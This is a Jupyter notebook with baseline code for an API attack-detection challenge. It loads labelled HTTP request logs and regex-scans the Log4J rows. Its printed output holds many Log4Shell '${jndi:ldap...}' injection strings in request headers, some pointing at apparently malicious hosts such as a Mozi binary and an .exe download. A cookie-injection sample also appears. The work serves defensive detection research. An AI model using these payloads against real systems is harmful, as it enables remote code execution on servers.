# Cisco - Ariel University API Security Detection Challenge 2023
## Baseline code


### Imports and global settings

In [1]:
# Imports, settings and first dataset view
import pandas as pd
import seaborn as sns
import numpy as np
import json
import matplotlib.pyplot as plt

from sklearn.feature_extraction.text import CountVectorizer, HashingVectorizer, TfidfVectorizer
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier, IsolationForest
from sklearn.metrics import confusion_matrix, classification_report
from collections import Counter
from sklearn.svm import LinearSVC, SVC
from sklearn.linear_model import LogisticRegression
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.preprocessing import StandardScaler 
import re


LOG_4_ATTACK = "LOGJATTACKHERE"

# Set pandas to show all columns when you print a dataframe
pd.set_option('display.max_columns', None)

# Global setting here you choose the dataset number and classification type for the model
dataset_number = 4 # Options are [1, 2, 3, 4]
test_type = 'attack_type' # Options are ['label', 'attack_type']


# Read the JSON training file and load it into a pandas DataFrame; you can change these settings
with open(f'./dataset_{dataset_number}_train.json') as file:
    # The `with` block closes the file on exit, so no explicit close() is needed
    raw_ds = json.load(file)
# Flatten nested JSON objects (up to two levels) into dotted column names
df = pd.json_normalize(raw_ds, max_level=2)
# Show the first five lines of the dataframe to see if everything was read accordingly
df.head()

Unnamed: 0,request.headers.Host,request.headers.User-Agent,request.headers.Accept-Encoding,request.headers.Accept,request.headers.Connection,request.headers.Sec-Ch-Ua-Platform,request.headers.Sec-Ch-Ua-Mobile,request.headers.Accept-Language,request.headers.Sec-Fetch-Site,request.headers.Sec-Fetch-Mode,request.headers.Cache-Control,request.headers.Sec-Fetch-User,request.headers.Sec-Fetch-Dest,request.headers.Set-Cookie,request.headers.Date,request.method,request.url,request.body,response.status,response.headers.Content-Type,response.headers.Content-Length,response.status_code,response.body,request.Attack_Tag,response.headers.Location,request.headers.Cookie,request.headers.Content-Length,response.headers.Set-Cookie,request.headers.Upgrade-Insecure-Requests
0,127.0.0.1:5000,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1...,"gzip, deflate, br",*/*,keep-alive,"""Windows""",?0,de-CH,none,same-origin,no-store,?1,document,['ttauth=AnmLHb1kdzYvpficmoZ6ahuxln7RK43GPlS6Q...,"Sun, 18 Dec 2022 01:42:25 GMT",GET,http://127.0.0.1:5000/orders/get/random/2,,200 OK,application/json,8,200,"[{}, {}]",,,,,,
1,127.0.0.1:5000,Mozilla/5.0 (Windows NT 6.3; Win64; x64) Apple...,"gzip, deflate, br",*/*,keep-alive,"""Windows""",?0,"en-US,en;q=0.9,he;q=0.8",none,websocket,no-cache,?1,document,['cid=9ML55TwNFFw14MA2N-N6B8v_LTjMEyppvz3F-H99...,"Sun, 18 Dec 2022 01:44:11 GMT",GET,http://127.0.0.1:5000/orders/check/exists?val=...,,404 NOT FOUND,application/json,31,404,"{""error"": ""Order ID not found""}",,,,,,
2,127.0.0.1:5000,Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20...,"gzip, deflate, br${jndi:ldaphabbologinbr.rel7....",*/*,keep-alive,,?1,"en-US,en;q=0.9,he;q=0.8",none,same-origin,no-store,?1,document,['ttauth=XSgpzlTZBc47Xm36ObpZplFzV2KbUgC68xBcA...,"Sun, 18 Dec 2022 01:34:30 GMT",GET,http://127.0.0.1:5000/login/user?username=Rich...,,401 UNAUTHORIZED,application/json,26,401,"{""error"": ""Access denied""}",LOG4J,,,,,
3,127.0.0.1:5000,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; ...,"x-gzip, x-deflate, gzip, deflate",*/*,keep-alive,"""Windows""",?1,"en-US,en;q=0.9,he;q=0.8",none,websocket,no-cache,?1,document,['ttauth=kOqLuuI_RaiyuKw-926q36BZ4s3ZH251NQ37i...,"Sun, 18 Dec 2022 01:43:59 GMT",GET,http://127.0.0.1:5000/greet/Warren,,200 OK,text/html; charset=utf-8,22,200,text/html; charset=utf-8,,,,,,
4,127.0.0.1:5000,Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) G...,"gzip, deflate, br",*/*,keep-alive,"""Windows""",?1,de-CH,none,websocket,max-age=0,?1,document,['ttauth=rN-ka7ksV-2K6QtY-_wNmdI1i4zY2kVoDQW6e...,"Sun, 18 Dec 2022 01:23:50 GMT",GET,http://127.0.0.1:5000/states/Bagdon?resource=R...,,404 NOT FOUND,application/json,28,404,"{""error"": ""State not found""}",,,,,,


### Basic dataset label arrangements

In [2]:
# Fill the blank attack tag lines with the "Benign" string
df['request.Attack_Tag'] = df['request.Attack_Tag'].fillna('Benign')
df['attack_type'] = df['request.Attack_Tag']

# This function will be used in the lambda below to iterate over the label columns 
# You can use this snippet to run your own lambda on any data with the apply() method
def categorize(row):
    """Map a row's attack tag to the binary label.

    Returns 'Benign' when row['request.Attack_Tag'] equals 'Benign',
    and 'Malware' for any other value.
    """
    is_benign = row['request.Attack_Tag'] == 'Benign'
    return 'Benign' if is_benign else 'Malware'

df['label'] = df.apply(lambda row: categorize(row), axis=1)

#df[df['attack_type'] == 'RCE'][['request.url']] = df[df['attack_type'] == 'RCE'][['request.url']].apply(lambda x: x.replace('http://127.0.0.1:5000/', ''))
# df[df['attack_type'] == 'SQL Injection'][['request.url']] = 
#     df[df['attack_type'] == 'SQL Injection'][['request.url']].apply()

# After finishing the arrangements we delete the irrelevant column
df.drop('request.Attack_Tag', axis=1, inplace=True)

df.head()

Unnamed: 0,request.headers.Host,request.headers.User-Agent,request.headers.Accept-Encoding,request.headers.Accept,request.headers.Connection,request.headers.Sec-Ch-Ua-Platform,request.headers.Sec-Ch-Ua-Mobile,request.headers.Accept-Language,request.headers.Sec-Fetch-Site,request.headers.Sec-Fetch-Mode,request.headers.Cache-Control,request.headers.Sec-Fetch-User,request.headers.Sec-Fetch-Dest,request.headers.Set-Cookie,request.headers.Date,request.method,request.url,request.body,response.status,response.headers.Content-Type,response.headers.Content-Length,response.status_code,response.body,response.headers.Location,request.headers.Cookie,request.headers.Content-Length,response.headers.Set-Cookie,request.headers.Upgrade-Insecure-Requests,attack_type,label
0,127.0.0.1:5000,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1...,"gzip, deflate, br",*/*,keep-alive,"""Windows""",?0,de-CH,none,same-origin,no-store,?1,document,['ttauth=AnmLHb1kdzYvpficmoZ6ahuxln7RK43GPlS6Q...,"Sun, 18 Dec 2022 01:42:25 GMT",GET,http://127.0.0.1:5000/orders/get/random/2,,200 OK,application/json,8,200,"[{}, {}]",,,,,,Benign,Benign
1,127.0.0.1:5000,Mozilla/5.0 (Windows NT 6.3; Win64; x64) Apple...,"gzip, deflate, br",*/*,keep-alive,"""Windows""",?0,"en-US,en;q=0.9,he;q=0.8",none,websocket,no-cache,?1,document,['cid=9ML55TwNFFw14MA2N-N6B8v_LTjMEyppvz3F-H99...,"Sun, 18 Dec 2022 01:44:11 GMT",GET,http://127.0.0.1:5000/orders/check/exists?val=...,,404 NOT FOUND,application/json,31,404,"{""error"": ""Order ID not found""}",,,,,,Benign,Benign
2,127.0.0.1:5000,Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20...,"gzip, deflate, br${jndi:ldaphabbologinbr.rel7....",*/*,keep-alive,,?1,"en-US,en;q=0.9,he;q=0.8",none,same-origin,no-store,?1,document,['ttauth=XSgpzlTZBc47Xm36ObpZplFzV2KbUgC68xBcA...,"Sun, 18 Dec 2022 01:34:30 GMT",GET,http://127.0.0.1:5000/login/user?username=Rich...,,401 UNAUTHORIZED,application/json,26,401,"{""error"": ""Access denied""}",,,,,,LOG4J,Malware
3,127.0.0.1:5000,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; ...,"x-gzip, x-deflate, gzip, deflate",*/*,keep-alive,"""Windows""",?1,"en-US,en;q=0.9,he;q=0.8",none,websocket,no-cache,?1,document,['ttauth=kOqLuuI_RaiyuKw-926q36BZ4s3ZH251NQ37i...,"Sun, 18 Dec 2022 01:43:59 GMT",GET,http://127.0.0.1:5000/greet/Warren,,200 OK,text/html; charset=utf-8,22,200,text/html; charset=utf-8,,,,,,Benign,Benign
4,127.0.0.1:5000,Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) G...,"gzip, deflate, br",*/*,keep-alive,"""Windows""",?1,de-CH,none,websocket,max-age=0,?1,document,['ttauth=rN-ka7ksV-2K6QtY-_wNmdI1i4zY2kVoDQW6e...,"Sun, 18 Dec 2022 01:23:50 GMT",GET,http://127.0.0.1:5000/states/Bagdon?resource=R...,,404 NOT FOUND,application/json,28,404,"{""error"": ""State not found""}",,,,,,Benign,Benign


In [3]:
def fill_na_df(df_na):
    """Replace every NaN in ``df_na`` with the string 'None', in place.

    Only columns that contain at least one NaN are rewritten; the other
    columns are left alone. Nothing is returned.
    """
    # Boolean mask over the columns: True where the column has any NaN
    has_missing = df_na.isna().any()
    for col_name in list(df_na.columns[has_missing]):
        # Alternative: drop the column instead of filling it
        # df_na.drop(col_name, axis=1, inplace=True)
        filled = df_na[col_name].fillna('None')
        df_na[col_name] = filled

    # To view the columns that contain at least one NaN value use this:
    # df_na.loc[:, df_na.isna().any()]

# Replace the NaN values of df in place with the string 'None'
fill_na_df(df)
# NOTE(review): pd.DataFrame(df) is not guaranteed to be an independent copy of df
# (for DataFrame input the constructor's default behaves like copy=False).
# If df_checker is meant to stay untouched by later in-place edits to df,
# df.copy() would be the safer choice -- confirm the intent.
df_checker = pd.DataFrame(df)

# df.to_csv(f'data_set_{dataset_number}.csv', index=False)

# Display the dataframe as the cell output
df


Unnamed: 0,request.headers.Host,request.headers.User-Agent,request.headers.Accept-Encoding,request.headers.Accept,request.headers.Connection,request.headers.Sec-Ch-Ua-Platform,request.headers.Sec-Ch-Ua-Mobile,request.headers.Accept-Language,request.headers.Sec-Fetch-Site,request.headers.Sec-Fetch-Mode,request.headers.Cache-Control,request.headers.Sec-Fetch-User,request.headers.Sec-Fetch-Dest,request.headers.Set-Cookie,request.headers.Date,request.method,request.url,request.body,response.status,response.headers.Content-Type,response.headers.Content-Length,response.status_code,response.body,response.headers.Location,request.headers.Cookie,request.headers.Content-Length,response.headers.Set-Cookie,request.headers.Upgrade-Insecure-Requests,attack_type,label
0,127.0.0.1:5000,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1...,"gzip, deflate, br",*/*,keep-alive,"""Windows""",?0,de-CH,none,same-origin,no-store,?1,document,['ttauth=AnmLHb1kdzYvpficmoZ6ahuxln7RK43GPlS6Q...,"Sun, 18 Dec 2022 01:42:25 GMT",GET,http://127.0.0.1:5000/orders/get/random/2,,200 OK,application/json,8,200,"[{}, {}]",,,,,,Benign,Benign
1,127.0.0.1:5000,Mozilla/5.0 (Windows NT 6.3; Win64; x64) Apple...,"gzip, deflate, br",*/*,keep-alive,"""Windows""",?0,"en-US,en;q=0.9,he;q=0.8",none,websocket,no-cache,?1,document,['cid=9ML55TwNFFw14MA2N-N6B8v_LTjMEyppvz3F-H99...,"Sun, 18 Dec 2022 01:44:11 GMT",GET,http://127.0.0.1:5000/orders/check/exists?val=...,,404 NOT FOUND,application/json,31,404,"{""error"": ""Order ID not found""}",,,,,,Benign,Benign
2,127.0.0.1:5000,Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20...,"gzip, deflate, br${jndi:ldaphabbologinbr.rel7....",*/*,keep-alive,,?1,"en-US,en;q=0.9,he;q=0.8",none,same-origin,no-store,?1,document,['ttauth=XSgpzlTZBc47Xm36ObpZplFzV2KbUgC68xBcA...,"Sun, 18 Dec 2022 01:34:30 GMT",GET,http://127.0.0.1:5000/login/user?username=Rich...,,401 UNAUTHORIZED,application/json,26,401,"{""error"": ""Access denied""}",,,,,,LOG4J,Malware
3,127.0.0.1:5000,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; ...,"x-gzip, x-deflate, gzip, deflate",*/*,keep-alive,"""Windows""",?1,"en-US,en;q=0.9,he;q=0.8",none,websocket,no-cache,?1,document,['ttauth=kOqLuuI_RaiyuKw-926q36BZ4s3ZH251NQ37i...,"Sun, 18 Dec 2022 01:43:59 GMT",GET,http://127.0.0.1:5000/greet/Warren,,200 OK,text/html; charset=utf-8,22,200,text/html; charset=utf-8,,,,,,Benign,Benign
4,127.0.0.1:5000,Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) G...,"gzip, deflate, br",*/*,keep-alive,"""Windows""",?1,de-CH,none,websocket,max-age=0,?1,document,['ttauth=rN-ka7ksV-2K6QtY-_wNmdI1i4zY2kVoDQW6e...,"Sun, 18 Dec 2022 01:23:50 GMT",GET,http://127.0.0.1:5000/states/Bagdon?resource=R...,,404 NOT FOUND,application/json,28,404,"{""error"": ""State not found""}",,,,,,Benign,Benign
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
182762,127.0.0.1:5000,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1...,"gzip, deflate, br",*/*,keep-alive,,?0,"en-US,en;q=0.5",none,websocket,no-cache,?1,document,['ttauth=NPpRHbzfv7BJ5RGB9-oJNl30Ttdc8RYxbuiSe...,"Sun, 18 Dec 2022 01:25:40 GMT",GET,http://127.0.0.1:5000/login/user?username=Brue...,,401 UNAUTHORIZED,application/json,26,401,"{""error"": ""Access denied""}",,,,,,SQL Injection,Malware
182763,127.0.0.1:5000,Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko...,"gzip, deflate, br",*/*,keep-alive,,?0,de-CH,none,websocket,no-cache,?1,document,['ttauth=Mqfe3PeeakWRmzjsA7MKaNiXmVcbMxMuNQxej...,"Sun, 18 Dec 2022 01:19:48 GMT",GET,http://127.0.0.1:5000/cookielogin,,200 OK,text/html; charset=utf-8,104,200,text/html; charset=utf-8,,username=gASVyAAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhb...,,,,Cookie Injection,Malware
182764,127.0.0.1:5000,Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebK...,"gzip, deflate, br",*/*,keep-alive,,?0,de-CH,none,same-origin,max-age=0,?1,document,['cid=-Sp8A62rcqJXADEypNzwtw-iIf9cdHkqMQvKTMNB...,"Sun, 18 Dec 2022 01:31:12 GMT",GET,http://127.0.0.1:5000/forum,,200 OK,text/html; charset=utf-8,128212,200,text/html; charset=utf-8,,,,,,XSS,Malware
182765,127.0.0.1:5000,Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...,"x-gzip, x-deflate, gzip, deflate",*/*,keep-alive,"""Windows""",?0,"en-US,en;q=0.5",none,same-origin,no-store,?1,document,['cid=ERxhJ-aIoFvtHePuy6iitkoC1AdXWOmx2r5Drhpl...,"Sun, 18 Dec 2022 01:50:29 GMT",GET,http://127.0.0.1:5000/orders/get/employee_id/35,,404 NOT FOUND,application/json,34,404,"{""error"": ""Employee ID not found""}",,,,,,Benign,Benign


In [4]:
# Label subset of interest (not used by the scan below)
keep_list = ['Benign', 'LOG4J']
# Only the LOG4J rows are inspected here
f = df[df['attack_type'] == 'LOG4J']
#print(*f['request.url'].values.tolist(), sep='\n')

# Matches a "${name:...}" expression anywhere inside a value; compiled once
# instead of on every cell of every row
lookup_pattern = re.compile(r'\$\{[a-z]+:.*\}')

set_cols = set()   # names of the columns in which the pattern was found
counter = 0        # total number of matching cells
column_names = f.columns.values.tolist()
for index, row in f.iterrows():
    for col in column_names:
        # Cells may hold non-string values, so compare on their text form
        data = str(row[col])
        if lookup_pattern.search(data):
            print(f'index:\t{index}')
            print(f'col name:\t{col}')
            print(f'data:{data}\n')
            counter += 1
            set_cols.add(col)
print()
print(set_cols)
print('counter:', counter)
f.shape


index:	2
col name:	request.headers.Accept-Encoding
data:gzip, deflate, br${jndi:ldaphabbologinbr.rel7.com/}

index:	10
col name:	request.headers.Set-Cookie
data:['ttauth=vX8s_fulSrKcPI643qpLHSOmRbwqG9fBIn_EjiXNpM0kMa4-J8AJOM2CUBngbQ-8XKgrYuu4d3GZlRjczgUd8Q; Domain=localhost:5000; Expires=Sun, 18 Dec 2022 01:44:42 GMT', 'ck=ELTyzjGnNBrYPiXZ4MyqfhKB6gzJB5fAKoyPpYOeBuY; Domain=www.pmg.csail.mit.edu/papers/popl97/popl97.html; Expires=Fri, 10 Feb 2023 01:38:42 GMT', 'uu=qouWZbTdWts8RpYdcZ2849SvhOKFrEhWg_pjdjtiJ_o; Domain=duye08.com; Expires=Mon, 09 Jan 2023 01:38:42 GMT', 'session=ee658d7b-1df0-4e7c-a759-452a6d62ce9a; Expires=Sun, 18 Dec 2022 01:43:42 GMT']${jndi:ldapsearch.espn.go.com/jimmy-rollins/}

index:	116
col name:	request.headers.Sec-Fetch-Site
data:none${jndi:ldaphttp://www.civelo.no/index.php?option=com_content&view=article&id=20:civelo-5&catid=14&Itemid=6&lang=sv}

index:	226
col name:	request.headers.Sec-Fetch-Dest
data:document${jndi:ldapcyncon.com/}

index:	237
col name:	requ

index:	21804
col name:	request.headers.Accept-Encoding
data:gzip, deflate, br${jndi:ldapamazon.com/Film-making-Introduction-Craft-Director/dp/0571211259}

index:	21849
col name:	request.headers.Set-Cookie
data:['cid=g86m4YsiVZHm0IOm4njZIjpX7dzFqm0a8cW90YqKt1uWzBotGsFUPsTk28f1rQnKQ6asdSaB5xZLlquJt9xicFg16DB9nGAs0yb5tchZPVElAI74YBTwh2DkijaPnViPDJbeWWQ4Gf33UmbKGiJ-AtQbXbnJOAcqnFb8IGsDSgU; Domain=localhost:5000; Expires=Sun, 18 Dec 2022 01:56:09 GMT', 'ck=mrOP3h_bsAyeA93PRr3_oyxmELRHMOB-fc1uD6bUwzE; Domain=people.famouswhy.com/anita_pointer/; Expires=Mon, 16 Jan 2023 01:19:09 GMT', 'uu=P_O79u4zTYbUhBLQiA-wrkARAYXU0HH9JTdhqJkLWt5a4P_zTperyDzelhqkq5ancW7OxXLw3H6agO9m8m6fPA; Domain=http://thewintershops.com/wp-admin/-/account_americafirstCU_login/login.php; Expires=Mon, 23 Jan 2023 01:19:09 GMT', 'session=4b2ce058-765f-44c3-ba8e-6e3401769783; Expires=Sun, 18 Dec 2022 01:56:09 GMT']${jndi:ldapwatchonedayfree.multiply.com/}

index:	21875
col name:	request.headers.Sec-Fetch-Site
data:none${jndi:

index:	31200
col name:	request.headers.Set-Cookie
data:['ck=U8i94WTCN8tVe771fUj6uA; Domain=http://web.de/magazine/unterhaltung/stars/krebs-angst-angelina-jolie-liess-eierstoecke-entfernen-30531050; Expires=Sun, 01 Jan 2023 01:38:48 GMT', 'uu=TeqOXU4muGT82D4ZwYYehg; Domain=facebook.com/pages/Just-For-Laughs-Gags/109222382437184; Expires=Fri, 30 Dec 2022 01:38:48 GMT', 'session=ece83037-f95d-4cd3-a3c3-fefb0e26b19e; Expires=Sun, 18 Dec 2022 02:03:48 GMT']${jndi:ldapchicostategamestudios.com/VideoGameProduction/}

index:	31211
col name:	request.headers.Set-Cookie
data:['cid=mNMMYTnHp5poKtZ0fS_cT5MfOTOUhrohtTQ0Dl7jcN4_li0kmcXKGgspAELVkslUKBNp6OilC4Qj3t9PcLydGvQvjdbsDNN0agsz0wsYluHCZ-09g0r5QsZ6JT2bdBkQJGIzzkVwmPyMUi2RrjwrD-43boXQOsFfU2eniDI0iBk; Domain=localhost:5000; Expires=Sun, 18 Dec 2022 01:46:47 GMT', 'ck=T1LpRXw6qtx10_mePAxnjBEcZbN-K9TA_waMOvVRyuSmXggbJmjho41zUcAmPVbuNjhAjtefMn4d67ZzxPfj0wH_KoPtz092KoagmdBtItjJMJpEcSnRwu1Vq5oXg7iOAoeAN6ZyF4bVzXOXdibwoDpAu9xl7GiUCuBQrfnfYq4; Domain=pit

index:	49622
col name:	request.headers.Set-Cookie
data:['ttauth=7jAUatyQcnKfmcxIQW9E8QxICW6B0TW7D_clk3g4sz8; Domain=localhost:5000; Expires=Sun, 18 Dec 2022 02:16:33 GMT', 'ck=wjNohpXK0hD2skS0GMz5dTfg7lXASw02x-1qe5V9e-o; Domain=http://9779.info/%E5%B9%BC%E5%84%BF%E5%9B%AD%E8%80%81%E5%B8%88%E8%B4%B4%E7%94%BB%E4%BD%9C%E5%93%81/; Expires=Thu, 26 Jan 2023 01:20:33 GMT', 'uu=_gDpFAUYVjTlHieyeiiRDw; Domain=http://mylust.com/videos/6534/tight-bald-pussy-of-my-voluptuous-teeny-girlfriend-is-fantastic/; Expires=Sun, 22 Jan 2023 01:20:33 GMT', 'session=a8f48425-60af-4023-aa1c-db0b234fa0e9; Expires=Sun, 18 Dec 2022 02:15:33 GMT']${jndi:ldapgenforum.genealogy.com/gault/}

index:	49670
col name:	request.headers.Set-Cookie
data:['ttauth=gBzxP1VdndFFrYHm5amE0GVRbrtKGDBfZsORgIeL9XY; Domain=localhost:5000; Expires=Sun, 18 Dec 2022 02:15:27 GMT', 'ck=HMu6szBaMmc-4YjVVXirB62SwDIfDQD9Bm7Fp9NXMSIFu8NYf1HHyolhBy3aOrpMekKq_7OTHTWM1EBBdu88PM4P9pqhMeztuBUw-wDf3E6JKr5C_0TtWDDi5hh_yHMgWZ1Gyh3H8u0UgRxlafkGwwUUt7s

index:	65062
col name:	request.headers.Sec-Fetch-Dest
data:document${jndi:ldapbay-journal.com/bay/1he/writings/sports/baseball-history-1937.html}

index:	65064
col name:	request.headers.Accept-Encoding
data:gzip, deflate, br${jndi:ldaphttps://pastebin.com/raw/0GDV0vg2}

index:	65070
col name:	request.headers.Set-Cookie
data:['ttauth=hSA6BSrSS2fmL-DjFQjEWw; Domain=localhost:5000; Expires=Sun, 18 Dec 2022 02:27:28 GMT', 'ck=eXQ1xjByMxVexdXUUk5xY-7O9JYSU2PMrMD4DtSztZ8; Domain=wn.com/Swimming_at_the_2000_Summer_Olympics; Expires=Thu, 02 Feb 2023 01:18:28 GMT', 'uu=DsutBc-FXDFVNg70EJ7bz_ENhbd85DdMWO7nie_K9W4; Domain=tools.ietf.org/html/rfc3094; Expires=Sat, 28 Jan 2023 01:18:28 GMT', 'session=ce67f730-c9cd-4edc-b85a-970e639fcad7; Expires=Sun, 18 Dec 2022 01:49:28 GMT']${jndi:ldapamphilsoc.org/mole/view?docId=ead/Mss.Ms.Coll.31-ead.xml}

index:	65142
col name:	request.headers.Set-Cookie
data:['cid=I9eQ8jGc01WCqg_H1-hMXXsORGn8c-HxkYFMSCQ_frFgwvOWI8_aEcLenTidIcRpembL9-Tm2gqm_JdLUQD_YQ2k-vwR1r9

index:	81052
col name:	request.headers.Sec-Fetch-Site
data:none${jndi:ldaphttp://www.develi.org.tr/index.php/haberler/son-haberler/54-iftihar-tablomuz.html}

index:	81074
col name:	request.headers.Set-Cookie
data:['cid=ZVvNwUa8oWmrs5YnIE6ZMj7MknDFrhUrzg9IVX8gmAHmq1cnn6KPbDmew8gfizaTdzKPbXW5inUs4FdVByaFJc4JawY_QxZ9BtLiVd0voNj4ITvD2PzXT9m2jbKFASyg0MyhvRZjXcWBx_L_bFmz_7O4JiQll_DSfdgHWm0bEfo; Domain=localhost:5000; Expires=Sun, 18 Dec 2022 01:53:56 GMT', 'ck=5plSQm8SCKws65itKcpkrw; Domain=http://77.43.129.51:55646/Mozi.m; Expires=Sat, 28 Jan 2023 01:30:56 GMT', 'uu=gW7q0lEW-ipWbodU_YxujAeuSo4Bul2g0Byc7CbF_hKUBJJJwOhYVjDsVb3HMHdzT4W78S8X7EioX6rlT76s9w; Domain=http://www.mycitystore.in/wp-includes/70187978dca46b3c15d58b15d045a3f0; Expires=Sun, 22 Jan 2023 01:30:56 GMT', 'session=292ab27d-10a4-46df-8817-5219df43a119; Expires=Sun, 18 Dec 2022 02:29:56 GMT']${jndi:ldapgenforum.genealogy.com/stafford/}

index:	81088
col name:	request.headers.Sec-Fetch-Site
data:none${jndi:ldaphttp://www.nordseem

index:	103924
col name:	request.headers.Set-Cookie
data:['ck=ZhwRyW5RHrSOmZBBlHylLyzNvBa5FeQFnUXo28XHFatoSfSWCB4jJLC0-B3aODvInyu9LJJp0YR7CcFjbswMkw; Domain=www.biotex-eu.com/pdf/phealth07_wearableinterfaces.pdf; Expires=Sun, 25 Dec 2022 01:39:19 GMT', 'uu=GnxsKOa5rxaMjFefIeO__kMbFxVC6AxhtGsPP4tKq-c; Domain=http://www.ambiani.nl/diensten/feesten-brabant/67-zalen-brabant.html; Expires=Fri, 20 Jan 2023 01:39:19 GMT', 'session=2225957b-82bf-4c28-bd27-4cd1831c9262; Expires=Sun, 18 Dec 2022 01:45:19 GMT']${jndi:ldapsaritamcharg.com/baba-khan---book-extracts.php}

index:	103951
col name:	request.headers.Set-Cookie
data:['ck=TfaIdaeYfLACJnr_mskfL7M12PvdZciNtA2FKKCDNrYJS6Jz3VB3p5XtafM9KjO0PMdAOA8fLwUhK0jzDHJzq4t-l-aa4Nwpz02wpsN9gfEqk48lioqi08S_W5GE7H3AMj4cf_7Le4XKq3eXgy26mnMJMOht0DLV-MmfiNC85-Q; Domain=mylovelymodels.com/models/saira-mohan-model_156.htm; Expires=Sat, 04 Feb 2023 01:21:43 GMT', 'uu=Yt-gjQIfFWbN8xHBtZ7dd8d8QzcMXLt4uh58LckBsiY4LC9j9nKrkNcAIt_us-2m36V-TTFelUgBTgqMwyh-9A; Domain=hom

index:	121271
col name:	request.headers.Sec-Fetch-Site
data:none${jndi:ldaphttps://toulousa.com/omg/291EYJSFYHMS.exe}

index:	121282
col name:	request.headers.Set-Cookie
data:['ck=9RA8i_Xn2mpE_HEu529FNw; Domain=articles.latimes.com/keyword/jelani-mccoy/featured/5; Expires=Tue, 17 Jan 2023 01:19:30 GMT', 'uu=CZDpvUTUPMTeBP6XWJ39aE340vzZTziZgVyor2qPG-4; Domain=www.parasoft.com/jsp/products/home.jsp?product=Jtest; Expires=Tue, 07 Feb 2023 01:19:30 GMT', 'session=c846310e-ba9d-4a85-8082-78c47f37d9db; Expires=Sun, 18 Dec 2022 01:44:30 GMT']${jndi:ldapblog.dreamhost.com/2011/10/03/e-commerce-websites-growing-in-popularity/}

index:	121323
col name:	request.headers.Set-Cookie
data:['ck=0pl4IyygOFzquRjRo4jDrQ; Domain=youtube.com/watch?v=z5-0H616lyE; Expires=Mon, 23 Jan 2023 01:32:43 GMT', 'uu=uHpNPKXxczD4zNMC1568vHn3URjQirQZsRTDDeJRllG89BK6ov2ow4MoabpWwKwGpHUp7vkIm8COhfYSdB3TJc7uP9OoXJQ3jfpKvPfLw2xpBjeSN7F4J6Keu_Hij09GSaUWTP7CuCl9nbqXqs4fQavDWrL9_b-YIqUxC4Upuk4; Domain=https://medium.com/this-

index:	141812
col name:	request.headers.Sec-Fetch-Dest
data:document${jndi:ldapdelaneydesign.com/photography.php}

index:	141833
col name:	request.headers.Sec-Fetch-Dest
data:document${jndi:ldaphttps://www.helpdesk-tech.com/signin?t=eyJhbGciOiJIUzI1NiJ9.eyJ0cmFja2luZ190b2tlbiI6IjM1ZWQ3NTJiLWRjNmMtNDI1My1hNjBhLTk3NjMwYjE4M2VlMSIsImNlbGwiOiJodHRwczovL3FnYmZ3b3c2MGYuZXhlY3V0ZS1hcGkudXMtd2VzdC0yLmFtYXpvbmF3cy5jb20vcHJvZC9hcGkvcGhpc2hpbmdjYW1wYWlnbiIsImNhbXBhaWduX3Rva2VuIjoiZmExNmQ4ZjItMGEzYi00MzMyLTkzYmItZGYyM2QzZGEyZTYzIiwic2VsZWN0ZWRfYXR0YWNrX3Rva2VuIjoiYjM3MDIxMDAtYzNlNC00YjNhLTkxOGMtMzhhMDdjOTE2MDc1IiwidGVzdF90b2tlbiI6dHJ1ZSwiZXh0ZXJuYWxfdHJhaW5pbmciOmZhbHNlLCJpYXQiOjE1ODg2Nzg0MDAsImlzcyI6Imh0dHBzOi8vYXBwLnBoaXNodGhyZWF0LmNvbSIsImV4cCI6MTU5NjQ1NDQwMH0.cXUeuuopjgZ6xYHArGr7U3JGKehmKyYRCJwt5mVlgKw}

index:	141875
col name:	request.headers.Set-Cookie
data:['cid=oNwTSWH0yHaHLdzx-syEEcemx_xp_MFgTnHQ5x5G-oGuozUCJw0BipRkOpvYbWSB-gFVhUOwZPH3nhr5E7DY5C80BUNwgoWvmzo4Uv0XNkubwQtH4PTkuc2IjGrVQdd6En

index:	161639
col name:	request.headers.Accept-Encoding
data:gzip, deflate, br${jndi:ldapfranciscodegoya.net/Charles-IV-And-His-Family.html}

index:	161716
col name:	request.headers.Sec-Fetch-Dest
data:document${jndi:ldapcanadianrvpal.com/d/on/}

index:	161739
col name:	request.headers.Set-Cookie
data:['cid=xvgFTwwW0p2FoEKUvO06K_RZ04XyS29IVQyWP0yRDBclg2uNYmNRKt89zYvOrtB36pHuTXnzH_TrcM4EqznjP9yRLuRriMjSVD7Amih8oTit3f7rNZkgqb_ODo5omIpjwMXZXxp46wWEN3hnXESFW_mmBb7ndSy_cxZNJYdXOY4; Domain=localhost:5000; Expires=Sun, 18 Dec 2022 01:28:14 GMT', 'ck=zGUbXTkg9mq9ZAmubymRCTyBA0KPjbZTh9sXikbPtMJkjudRuhyc0wSplE_2jiXlDsRjpZq_ovp--YNBoAr5FA; Domain=oldsacramento.com/ajaxfilemanager/uploaded/Documents/news/?Kevin+James+O%27Leary; Expires=Mon, 23 Jan 2023 01:21:14 GMT', 'uu=kGrKMJHt1nalBvMO2ugicw; Domain=https://www.jeffersonsgroup.com/BOAedited/en; Expires=Mon, 06 Feb 2023 01:21:14 GMT', 'session=5c7bee89-cad4-453c-bc07-62072333e917; Expires=Sun, 18 Dec 2022 02:14:14 GMT']${jndi:ldapjackbenny.org/ww

index:	179299
col name:	request.headers.Set-Cookie
